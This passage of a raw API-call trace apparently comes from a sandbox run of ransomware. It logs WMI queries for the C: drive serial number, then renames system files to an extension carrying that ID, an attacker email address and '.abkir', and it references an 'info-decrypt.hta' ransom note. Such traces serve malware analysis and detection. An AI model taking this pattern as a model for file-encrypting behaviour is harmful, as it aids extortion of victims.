pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0194.102] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0194.102] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.103] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x6027670) returned 0x0 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027670, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0194.103] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027670, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6030a90) returned 0x0 [0194.103] WbemDefPath:IUnknown:Release (This=0x6027670) returned 0x0 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6030a90) returned 0x0 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0194.103] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0194.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0x66ccb38) returned 0x0 [0194.103] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.103] WbemDefPath:IUnknown:Release (This=0x66ccb38) returned 0x3 [0194.103] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0194.104] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0194.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0194.104] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0194.104] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0194.104] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0194.104] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0194.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6030a90) returned 0x0 [0194.104] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0194.104] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0194.104] WbemDefPath:IWbemPath:SetText (This=0x6030a90, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0194.104] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0194.104] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0194.104] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.104] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0194.104] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0194.104] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0194.104] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.105] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6023ac8) returned 0x0 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x6023ac8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0194.105] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023ac8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x60275f0) returned 0x0 [0194.105] WbemLocator:IUnknown:Release (This=0x6023ac8) returned 0x0 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x60275f0) returned 0x0 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0194.105] WbemLocator:IUnknown:AddRef (This=0x60275f0) returned 0x3 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0194.105] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0194.105] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0194.105] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0194.105] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x2 [0194.105] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x1 [0194.105] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0194.106] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0194.106] WbemLocator:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x60275f0) returned 0x0 [0194.106] WbemLocator:IUnknown:AddRef (This=0x60275f0) returned 0x3 [0194.106] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x2 [0194.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0194.106] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0194.106] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.106] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x60276b0) returned 0x0 [0194.106] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60276b0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x6033164) returned 0x0 [0194.909] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5b6d4) returned 0x0 [0194.909] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b6d4, pProxy=0x6033164, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0194.909] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x1 [0194.909] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5b6f4) returned 0x0 [0194.910] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5b6d4) returned 0x0 [0194.910] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b6d4, pProxy=0x6033164, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0194.910] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x2 [0194.910] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0194.910] CoTaskMemFree (pv=0xbd4a38) [0194.910] WbemLocator:IUnknown:Release (This=0x60276b0) returned 0x0 [0194.910] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5b6f4) returned 0x0 [0194.910] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0194.911] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0194.912] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0194.912] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0194.912] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0194.914] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5b654) returned 0x0 [0194.914] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.914] WbemLocator:IUnknown:Release (This=0xb5b654) returned 0x3 [0194.914] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0194.914] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0194.914] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5b6dc) returned 0x0 [0194.914] WbemLocator:IRpcOptions:Query (in: This=0xb5b6dc, pPrx=0xb5b6f4, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0194.914] WbemLocator:IUnknown:Release (This=0xb5b6dc) returned 0x3 [0194.914] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0194.914] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0194.914] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0194.914] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x6033164) returned 0x0 [0194.914] WbemLocator:IUnknown:AddRef (This=0x6033164) returned 0x4 [0194.914] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x3 [0194.914] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x2 [0194.914] SysStringLen (param_1=0x0) returned 0x0 [0194.915] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0194.915] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0194.915] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.915] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0194.915] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0194.915] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5b6f4) returned 0x0 [0194.915] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x3 [0194.915] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0194.915] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0194.915] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.915] IWbemServices:GetObject (in: This=0x6033164, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028180, ppCallResult=0x0) returned 0x0 [0195.428] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0195.428] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0195.428] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.428] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39aa610*=0, plFlavor=0x39aa614*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x39aa610*=8, plFlavor=0x39aa614*=0) returned 0x0 [0195.428] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.428] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.428] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39aa610*=8, plFlavor=0x39aa614*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x39aa610*=8, plFlavor=0x39aa614*=0) returned 0x0 [0195.428] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.429] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.429] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0195.429] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0195.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0195.429] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x2d6a0c00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0195.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0195.429] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0195.649] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpFilePart=0x0) returned 0x30 [0195.649] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", lpFilePart=0x0) returned 0x35 [0195.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0195.649] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd8d820, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2cd8d820, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2cd8d820, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0195.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0195.649] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpFilePart=0x0) returned 0x30 [0195.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0195.649] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: 